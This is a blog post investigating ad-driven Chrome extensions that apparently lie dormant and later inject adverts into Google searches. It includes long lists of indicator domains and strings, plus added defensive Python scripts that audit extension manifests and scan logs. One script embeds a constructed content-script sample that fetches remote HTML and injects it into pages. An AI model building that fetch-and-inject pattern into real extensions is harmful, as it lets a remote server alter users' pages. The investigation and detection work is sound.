Google Chrome Extensions hiding and waiting?

Update 2018-11-03: I’ve finally managed to get one of the extensions to do something unwanted after weeks of it being installed. The Zoom Picture extension is now injecting adverts into Google searches: adverts that would otherwise not be there for the query I’m searching.

[screenshot: chrome hiding extensions.png]

It looks like the adverts are pulled in from “othersearch.info” using “affid=8383”.

Update 2018-10-01: The Scroll To Top extension is still live in the Chrome store, but the scammers have launched a new one: “Zoom picture”. Also associated is “oitep.com”.

Update 2018-08-10: All the “with” extensions have been removed from the Chrome store, but a new one has appeared: “Scroll To Top”.

Update 2018-06-25: Looks like Google have removed at least two of the suspicious extensions from the Chrome Store; one still remains online.

[screenshot: junkextension contains malware]

I’ve seen a strange advert around the internet recently. Sadly I don’t have a screenshot of the advert, but it was claiming that I could click on it to get maps and directions.

Clicking through from the advert, you see a page relating to map directions:

[screenshot: vomesq landing page]

However, on a second visit to the same page, if you don’t go via the advert and have cleared your cookies, you get a very different page:

[screenshot: hiding extension title on second visit]

Already suspicious: why offer a “mapping” extension which is titled “Slideshow”, and then why hide the mapping part of it if someone visits the site without going via the advert?

Clicking any of the elements on the page prompts you to install suspiciously named Google Chrome extensions, such as:

Tetsop Slideshow with horses
Vomesq Slideshow with four seasons
Ustif slideshow with Rainbow
Klastaf Slideshow with four seasons
Scroll To Top by lacroix.clothilde
Zoom picture by osbornehenry3

[screenshot: tetsop extension listing]

So, you install the extension.. and nothing useful happens. You don’t get driving directions, but you do get horse pictures or other rotating GIFs inserted into the Google home page (as shown in the extension screenshot). At the time of the screenshot above the extension had 12,000 users; at the time of writing it has 14,000.

The extension’s content script has the ability to modify absolutely any web page the user visits. At the time of writing it appears not to be doing anything malicious: the sites it regex-matches against are Google domains.
Upon visiting a Google home page it fetches some code from the extension’s host domain (one of the data1.* hosts listed below). At the moment this is just GIFs, which it then injects into the page.
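The two things worth checking in any extension like this are its manifest (does it ask for access to every site, and which pages do its content scripts run on?) and whether a content script pulls content from a remote host and writes it into the page. The script below is an added example and not code from the post or from the extensions themselves; the manifest and the content script it audits are constructed to match what the post describes (a Manifest V2 extension with `<all_urls>`, content scripts matching Google domains, and a fetch from a data1.* host). The `audit_extension_dir` helper can be pointed at an unpacked Chrome profile `Extensions` folder to audit everything installed.

```python
import json
import re
from pathlib import Path
from urllib.parse import urlparse

# Constructed manifest in the shape the post describes (assumption; the post
# does not reproduce the real manifest.json).
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "Slideshow with horses",
  "version": "1.0",
  "permissions": ["tabs", "storage", "<all_urls>"],
  "content_scripts": [
    {"matches": ["*://*.google.com/*", "*://*.google.co.uk/*"],
     "js": ["content.js"], "run_at": "document_end"}
  ]
}
""")

# Constructed content script: fetches HTML from a remote host and injects it.
SAMPLE_CONTENT_JS = r"""
var host = "https://data1.vomesq.com";
fetch(host + "/partners/plugins/openanigif/openvomesq-data.php")
  .then(r => r.text())
  .then(html => { document.body.insertAdjacentHTML("beforeend", html); });
"""

# Match patterns that grant a script access to every origin.
BROAD_PATTERNS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def audit_manifest(manifest):
    """Return human-readable findings about over-broad host access."""
    findings = []
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    for perm in perms:
        if perm in BROAD_PATTERNS:
            findings.append(f"host permission grants access to every site: {perm}")
    for cs in manifest.get("content_scripts", []):
        for m in cs.get("matches", []):
            if m in BROAD_PATTERNS:
                findings.append(f"content script {cs.get('js')} runs on every page: {m}")
            elif re.search(r"google\.", m):
                findings.append(f"content script {cs.get('js')} runs on Google pages: {m}")
    return findings


URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?")


def remote_hosts(js_source):
    """Hosts referenced by absolute URL anywhere in a script."""
    return sorted({urlparse(u).hostname for u in URL_RE.findall(js_source)})


def fetch_and_inject(js_source):
    """True if the script both fetches remote content and writes HTML into the DOM."""
    fetches = re.search(r"\b(fetch|XMLHttpRequest)\b", js_source) is not None
    injects = re.search(r"\b(innerHTML|insertAdjacentHTML|appendChild)\b", js_source) is not None
    return fetches and injects


def audit_extension_dir(root):
    """Walk an unpacked Extensions directory and audit every manifest.json found.

    Returns {extension_dir: [findings]} for extensions with at least one finding.
    """
    report = {}
    for manifest_path in Path(root).rglob("manifest.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        findings = audit_manifest(manifest)
        for js in manifest_path.parent.rglob("*.js"):
            src = js.read_text(encoding="utf-8", errors="replace")
            if fetch_and_inject(src):
                findings.append(
                    f"{js.name} fetches remote content and injects it; hosts: {remote_hosts(src)}"
                )
        if findings:
            report[str(manifest_path.parent)] = findings
    return report


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print("manifest:", f)
    if fetch_and_inject(SAMPLE_CONTENT_JS):
        print("content.js fetches and injects; hosts:", remote_hosts(SAMPLE_CONTENT_JS))
```

A content script that only matches Google pages is not by itself a problem; the combination of `<all_urls>` (so the behaviour can be widened without a new permission prompt), a remote fetch, and DOM injection is what turns a GIF slideshow into an ad injector or worse with a single server-side change.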

What is the point? Someone is spending $$ on advert clicks to install a Chrome extension that does nothing related to the claims in the advert.

It almost seems like they are gathering a user base and will sell, or change, the Chrome extension in the future to do something malicious or unintended.

Domains relating to this:
data1.vomesq.com
data1.tetsop.com
data1.ustif.com
data1.klastaf.com
natofo.com
travispa.com
onsevino.com
mixoum.com
toutravi.com
amoindi.com
resolve
data1.ustif.com
data1.open-dog.com
data1.gestona.com
data1.iti-maps.fr
data1.mareps.com
data1.teryom.com
data1.estracep.com
data1.imastifi.com
data1.lorelam.com
data1.meu-imc.com
data1.lolaji.com
data1.jounyl.com
data1.selbamo.com
data1.losimt.com
data1.ubersetzung-app.com
data1.anastras.com
data1.barbuna.com
data1.imc-peso.com
data1.ludimaro.com
data1.repossot.com
data1.noesla.com
data1.visoum.com
data1.rosalop.com
data1.exatrom.com
data1.onolli.com
data1.phistouquet.com
data1.felinao.com
data1.iginot.com
data1.makiloy.com
data1.futeala.com
data1.besinaf.com
data1.proufta.com
data1.pintoula.com
data1.nadasto.com
data1.mein-bmi.com
data1.qopletr.com
data1.toumina.com
data1.trumaeo.com
data1.ma-direction.com
data1.fertoul.com
data1.sopreni.com
data1.klastaf.com
data1.bmi-result.com
data1.chrchaimoua.com
data1.swapagg.com
data1.aligoram.com
data1.inadoul.com
data1.sollmia.com
data1.pictdog.com
data1.road-maps.fr
ip20.ip-91-121-54.eu
data1.scopich.com
data1.myloap.com
data1.platoks.com
data1.tetsop.com
data1.sabrelpt.com
data1.routenplaner-karten.com
data1.slimness.fr
data1.stoploco.com
data1.janomirg.com
data1.papsinim.com
data1.sabuf.com
data1.vomesq.com
data1.calcolo-bmi.com
data1.esiliq.com
data1.zargu.com
data1.eurosty.com
data1.noegate.com
data1.bicelou.com
data1.quotient-retraite.fr
data1.greskof.com
data1.bmi-tw.com
data1.maulou.com
data1.gorgiia.com
data1.chutalop.com
data1.quizdoamor.com
data1.oomatie.com
data1.cholty.com
data1.pomrolo.com
data1.point-meteo.fr
data1.recalomoy.com
data1.hyjouco.com
data1.roterf.com
data1.elixet.com
data1.consimis.com
data1.formulapeso.com
data1.saumaf.com
data1.cloakyz.com
data1.my-ideal-weight.com
data1.bmi-berech.com
data1.compasou.com
data1.qibizar.com
data1.poulixo.com
data1.perfect-imc.com
data1.modalas.com
data1.debozoiz.com
data1.mio-percorso.com
data1.plopatic.com
data1.carazouco.com
data1.strasscom.com
data1.frumaa.com
data1.solkyl.com
data1.zoobre.com
data1.rydima.com
data1.monstegou.com
data1.plifacil.com
data1.serlaz.com
data1.stoumo.com
data1.recettes-en-ligne.eu
data1.lettres.net
data1.trouvayca.com
data1.toustestests.com
data1.liloust.com
data1.pasruma.com
data1.lovincalculator.com
data1.stenap.com
data1.ablapol.com
data1.wikimot.fr
data1.olleap.com
data1.macoulpa.com
data1.mes-resultats.com
data1.astrolignes.com
data1.tests-moi.com
data1.dermabeauty.fr
data1.imc-calcular.com
data1.zunelrish.com
data1.kodamil.com
data1.yetras.com
data1.qhirta.com
data1.ruta-mapa.com
data1.eferif.com
data1.javelas.com
data1.ujdilon.com
data1.eneude.com
data1.shakkly.com
data1.bipoel.com
data1.nedolla.com
data1.quizdeamor.com
data1.tramolol.com
data1.kismuta.com
data1.tatoflex.com
data1.iglere.com
data1.roblaprouf.com
data1.grilsta.com
data1.gelupi.com
data1.logmati.com
data1.gopilou.com
data1.ohquizz.com
data1.uclat.com
data1.pronzal.com
data1.crisofil.com
data1.dom-app.com
data1.trajets-cartes.com
data1.blamap.com
data1.app-fast.com
data1.annitop.com
data1.nofinaj.com
data1.raepdi.com
data1.calcolo-imc.com
data1.clibar.com
data1.stuana.com
data1.meluli.com
data1.metoun.com
data1.rlicte.com
data1.my-drivingdirections.com
data1.phonalo.com
data1.seconnecter-ici.com
data1.sjilota.com
data1.tyhfepa.com
data1.cloumapco.com
data1.flomaga.com
data1.glicalol.com
data1.noxip.com
data1.gimoli.com
data1.modlat.com
data1.mimaloy.com
data1.manulap.com
data1.cichalou.com
data1.villonat.com
data1.sqadipt.com
data1.iblep.com
data1.slopap.com
data1.stropemer.com
data1.chloki.com
data1.bimwal.com
data1.vlouma.com
data1.satinat.com
data1.apps-italia.com
data1.bezadi.com
data1.samalag.com
data1.lolipt.com
data1.dailyforme.com
data1.start-bmi.com
data1.snarwin.com
data1.ahnat.com
data1.miazuz.com
data1.isobiv.com
data1.atoleg.com
data1.elplic.com
data1.ygivas.com
data1.gripoal.com
data1.klepst.com
data1.manipo.com
data1.luchil.com
data1.soqano.com
data1.baldoun.com
data1.troplip.com
data1.donasip.com
data1.solisoll.com
data1.satouna.com
data1.ortisul.com
data1.avortep.com
data1.stravit.com
data1.grexlip.com
data1.haverto.com
data1.blikux.com
data1.masowe.com
data1.slimya.com
data1.nistada.com
data1.lapretofe.com
data1.depemel.com
data1.sotella.com
data1.ofarnut.com
data1.peso-altezza.com
data1.pocket-rezept.com
data1.routen-karten.com
data1.open-cat.com
data1.meoust.com
data1.allastin.com
data1.naliora.com
data1.slapapi.com
data1.boulass.com
data1.mestaf.com
data1.routenweb.com
data1.recettes.net
data1.les-pages.com
data1.yummmi.es

Strings relating to this:
/plug-post-install.php
my-drivingdirections
partners/plugins/openanigif/openvomesq-data.php
partners/plugins/openanigif/opentetsop-data.php
partners/plugins/openanigif/open-regexps.php
update-version.php
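The domain and string lists above are most useful as indicators to sweep logs and extension directories with, and the affid-tagged othersearch.info links from the 2018-11-03 update are what to look for in a saved Google results page. The script below is an added example, not the post’s own tooling; it embeds only a subset of the domains listed above (extend `IOC_DOMAINS` with the rest), and the proxy log lines and HTML it scans are constructed samples, not real captures. Matching is on the registrable domain, so any data1.* subdomain hits.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Subset of the indicators listed in the post; extend with the full list.
IOC_DOMAINS = {
    "vomesq.com", "tetsop.com", "ustif.com", "klastaf.com", "natofo.com",
    "travispa.com", "onsevino.com", "mixoum.com", "toutravi.com",
    "amoindi.com", "othersearch.info", "oitep.com",
}
IOC_STRINGS = (
    "/plug-post-install.php",
    "my-drivingdirections",
    "partners/plugins/openanigif/",
    "update-version.php",
)


def host_matches(host):
    """True if host equals, or is a subdomain of, an indicator domain."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


# Anything that looks like a hostname: dotted labels ending in a TLD.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def match_iocs(text):
    """Indicator hits (hostnames and path strings) found in free text such as a log."""
    hits = set()
    for h in HOST_RE.findall(text):
        if host_matches(h):
            hits.add(h.lower())
    for s in IOC_STRINGS:
        if s in text:
            hits.add(s)
    return hits


class _LinkCollector(HTMLParser):
    """Collect href attributes of <a> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for k, v in attrs:
                if k == "href" and v:
                    self.hrefs.append(v)


def injected_links(html):
    """Links in a saved results page that point at an indicator domain or carry
    an affiliate id parameter, which ordinary Google results do not."""
    p = _LinkCollector()
    p.feed(html)
    out = []
    for href in p.hrefs:
        u = urlparse(href)
        if host_matches(u.hostname) or "affid" in parse_qs(u.query):
            out.append(href)
    return out


# Constructed sample inputs (not real captures).
SAMPLE_LOG = """\
2018-11-03 10:01:02 GET https://www.google.com/search?q=test 200
2018-11-03 10:01:03 GET https://data1.vomesq.com/partners/plugins/openanigif/open-regexps.php 200
2018-11-03 10:01:04 GET https://othersearch.info/?affid=8383&q=test 200
"""
SAMPLE_HTML = """\
<div><a href="https://en.wikipedia.org/wiki/Test">Test</a>
<a href="https://othersearch.info/click?affid=8383&amp;q=test">Sponsored</a>
<a href="http://data1.klastaf.com/x">x</a></div>
"""

if __name__ == "__main__":
    print("log hits:", sorted(match_iocs(SAMPLE_LOG)))
    print("injected links:", injected_links(SAMPLE_HTML))
```

Run `match_iocs` over proxy or DNS logs to find hosts that have been talking to the data1.* infrastructure, and `injected_links` over a results page saved from an affected browser to confirm the ad injection without relying on the extension still behaving the same way when you look.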


1 Response to Google Chrome Extensions hiding and waiting?

  1. Seb Wilkes says:

    Hello. My Mum had this on her laptop when I went to go see her, or one calling itself “Klastaf”

    I totally agree! No one spends $$ to get a gif onto the page, but I don’t know what’s going on. Recently the password I tried entering into our joint Amazon account did not work, and I can’t help but think the two situations are connected. (We currently live at different addresses)

    Thing is I am not that computer literate so I was wondering if you had got any further.

    Thanks for writing this! Seb
